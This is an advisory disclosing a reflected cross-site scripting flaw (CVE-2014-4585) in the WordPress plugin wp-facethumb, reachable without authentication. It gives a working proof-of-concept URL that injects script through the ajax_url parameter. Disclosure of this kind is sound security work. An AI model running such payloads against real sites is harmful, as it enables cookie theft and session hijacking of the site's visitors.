wp-plugin : wp-facethumb – A3-Cross-Site Scripting (XSS)

 

Plugin Details

 

Plugin Name : wp-facethumb

 

Effected Version : (and most probably lower version's if any)

 
Vulnerability : A3-Cross-Site Scripting (XSS)
 
Identified by : Anant Shrivastava

 

 

Technical Details

 

Minimum Level of Access Required : Unauthenticated

 

PoC - (Proof of Concept) :

 
http://localhost/wp-content/plugins/wp-facethumb/index.php?ajax_url=ajax_url'>alert(document.cookie)&

 

Vulnerable Parameter : ajax_url

 

Disclosure Timeline

 

Vendor Contacted : 2014-01-17

 
Plugin Status : Updated on 2014-01-11
 
Public Disclosure : June 12, 2014
 
CVE Number : CVE-2014-4585

 
Plugin Description :
 
[WP-FaceThumb](http://www.mnt-tech.fr/wp-facethumb/) allows your visitors to take a picture with their webcam and post it on a widget to your blog.

Leave a Reply

Your email address will not be published. Required fields are marked *